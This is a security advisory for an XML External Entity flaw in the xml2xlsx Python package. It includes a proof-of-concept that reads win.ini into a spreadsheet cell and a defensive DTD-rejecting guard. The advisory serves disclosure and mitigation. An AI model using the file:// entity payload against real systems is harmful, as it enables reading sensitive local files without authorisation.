WS-2021-0112
Date: May 20, 2021
Overview
The 'xml2xlsx' PyPI module, version 1.0.1, is vulnerable to XML External Entity (XXE) injection: the function `xml2xlsx()` does not restrict external entities while parsing a specially crafted XML document. Due to this flaw an attacker could read local files by defining an external entity with a file:// URI.
Details
The PyPI module 'xml2xlsx' is vulnerable to XML External Entity (XXE) injection because the function `xml2xlsx()` does not restrict external entities while parsing a specially crafted XML document. Due to this flaw an attacker could read local files by defining an external entity with a file:// URI.
PoC Details
The function `xml2xlsx()` does not restrict external entities while parsing the XML data. By leveraging this flaw, an attacker can read an arbitrary file and obtain sensitive information, as shown in the PoC. Running it creates a file named "test.xlsx" whose cell content exposes the contents of the `win.ini` file.
PoC Code
from xml2xlsx import xml2xlsx

# XML template carrying an external entity; the parser resolves it from the file:// URI
template_id = """<?xml version="1.0" ?>
<!DOCTYPE replace [<!ENTITY ent SYSTEM "file:///c:/windows/win.ini"> ]>
<sheet title="test">
  <row><cell>vulnerable</cell></row>
  <row><cell>&ent;</cell></row>
</sheet>"""

# The resulting workbook contains the expanded entity in the second row
f = open('test.xlsx', 'wb')
f.write(xml2xlsx(template_id))
f.close()
Affected Environments
1.0.1
Prevention
No fix
Language: Python
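Because no fixed version of xml2xlsx exists, the practical mitigation is to refuse any XML that declares a DTD before it reaches `xml2xlsx()`. The guard below is an added example written for this page; it is not code from the xml2xlsx project or from the advisory. It uses only the standard-library expat bindings, which report DOCTYPE and `<!ENTITY>` declarations through handlers before any entity in the body is resolved, and it never installs an external-entity handler, so nothing is fetched. The `converter` parameter and the sample documents (including the placeholder file path) are constructed for the demonstration.

```python
# Added defensive example: reject XML carrying a DTD before handing it to an
# XXE-prone converter such as xml2xlsx.xml2xlsx(). Not part of the xml2xlsx project.
import xml.parsers.expat


class UnsafeXMLError(ValueError):
    """Raised when a document declares a DTD, the prerequisite for XXE."""


def inspect_dtd(xml_text):
    """Return a list of DTD findings without expanding any entity.

    Each finding is a tuple: ("doctype", root_name, system_id) or
    ("external-entity" | "internal-entity", entity_name, system_id).
    An empty list means the document declares no DTD at all.
    """
    findings = []
    parser = xml.parsers.expat.ParserCreate()
    # Never fetch an external DTD subset or parameter entities.
    parser.SetParamEntityParsing(xml.parsers.expat.XML_PARAM_ENTITY_PARSING_NEVER)

    def on_doctype(name, system_id, public_id, has_internal_subset):
        findings.append(("doctype", name, system_id))

    def on_entity(name, is_parameter, value, base, system_id, public_id, notation):
        # system_id is set for SYSTEM/PUBLIC entities: the XXE primitive.
        kind = "external-entity" if system_id else "internal-entity"
        findings.append((kind, name, system_id))

    parser.StartDoctypeDeclHandler = on_doctype
    parser.EntityDeclHandler = on_entity
    # No ExternalEntityRefHandler is installed, so &ent; is never resolved here.
    parser.Parse(xml_text, True)
    return findings


def safe_convert(xml_text, converter):
    """Run `converter` (e.g. xml2xlsx.xml2xlsx) only if the document has no DTD.

    `converter` is a hypothetical callable taking the XML text; pass the real
    xml2xlsx function in production and log the findings on rejection.
    """
    findings = inspect_dtd(xml_text)
    if findings:
        raise UnsafeXMLError("refusing XML with DTD declarations: %r" % (findings,))
    return converter(xml_text)


# Constructed sample documents for the demonstration.
BENIGN_SHEET = '<?xml version="1.0"?><sheet title="ok"><row><cell>hi</cell></row></sheet>'
XXE_SHEET = """<?xml version="1.0"?>
<!DOCTYPE replace [<!ENTITY ent SYSTEM "file:///PLACEHOLDER/sensitive.txt">]>
<sheet title="test"><row><cell>&ent;</cell></row></sheet>"""


if __name__ == "__main__":
    print("benign:", inspect_dtd(BENIGN_SHEET))
    print("xxe:", inspect_dtd(XXE_SHEET))
    try:
        safe_convert(XXE_SHEET, lambda text: text.encode())
    except UnsafeXMLError as exc:
        print("rejected:", exc)
```

Rejecting every DTD, not just external entities, is deliberate: internal entities enable entity-expansion denial of service, and no legitimate xml2xlsx template needs a DOCTYPE.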
Good to know:
Improper Restriction of XML External Entity Reference ('XXE')
CWE-611
Upgrade Version
No fix version available
Base Score:
Attack Vector (AV): Network
Attack Complexity (AC): Low
Privileges Required (PR): Low
User Interaction (UI): None
Scope (S): Unchanged
Confidentiality (C): Low
Integrity (I): Low
Availability (A): None